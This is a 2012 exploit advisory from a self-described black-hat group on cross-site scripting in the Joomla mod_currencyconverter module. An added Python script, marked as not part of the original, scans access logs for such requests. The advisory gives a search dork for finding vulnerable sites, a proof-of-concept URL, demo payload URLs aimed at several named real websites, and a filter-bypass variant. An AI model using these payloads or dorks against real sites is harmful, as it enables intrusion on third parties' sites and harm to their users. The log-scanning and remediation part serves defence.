# Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
# Date: 2012-02-02 [GMT +7]
# Author: BHG Security Center
# Software Link: http://joomla.org
# Dork: inurl:/includes/convert.php?from=
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
Joomla modules (mod_currencyconverter) XSS Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-02-02
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
------------- ( Cross Site Scripting ) ~
~ [PoC] ~: http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
------------- ( Demo Vulnerability ) ~
Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
Note: The URL-encoded GET input convert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [to bypass Mod-Security]
Timeline:
~~~~~~~~~
- 29-01-2012: bug found.
- 01-02-2012: vendor contacted, but no response.
- 02-02-2012: advisory released.
---------------------------------------------------------------------------
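
Added example (not part of the original advisory and not the module's own code): a log check that finds requests to convert.php whose "from" parameter, once percent-decoding is undone, is anything other than a plain currency code. It assumes combined-log-format access logs and that a legitimate "from" value is three letters; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter name come from the advisory's PoC line.
TARGET = "/modules/mod_currencyconverter/includes/convert.php"
# Assumption: a legitimate `from` value is a three-letter currency code.
VALID_FROM = re.compile(r"[A-Za-z]{3}")
# Client address and request target of a combined-log-format entry.
ENTRY = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Feb/2012:10:00:01 +0700] "GET /modules/mod_currencyconverter/includes/convert.php?from=USD HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Feb/2012:10:00:09 +0700] "GET /site/modules/mod_currencyconverter/includes/convert.php?from=%27%3E%3E%3Cmarquee%3E%3Ch1%3EPentest%3C%2Fh1%3E%3C%2Fmarquee%3E HTTP/1.1" 200 734',
    '203.0.113.5 - - [02/Feb/2012:10:01:30 +0700] "GET /index.php?from=%3Cb%3E HTTP/1.1" 200 90',
]


def fully_decode(value, rounds=3):
    """Normalise repeated percent-encoding before the value is checked."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines):
    """Return (client, decoded value) for each request to the module whose
    `from` parameter is not a plain currency code."""
    hits = []
    for line in lines:
        m = ENTRY.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(TARGET):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("from", []):
            value = fully_decode(raw)
            if not VALID_FROM.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}\tfrom={value!r}")
```

The same allowlist applied inside the handler, together with HTML-encoding the value on output, removes the reflection at its source.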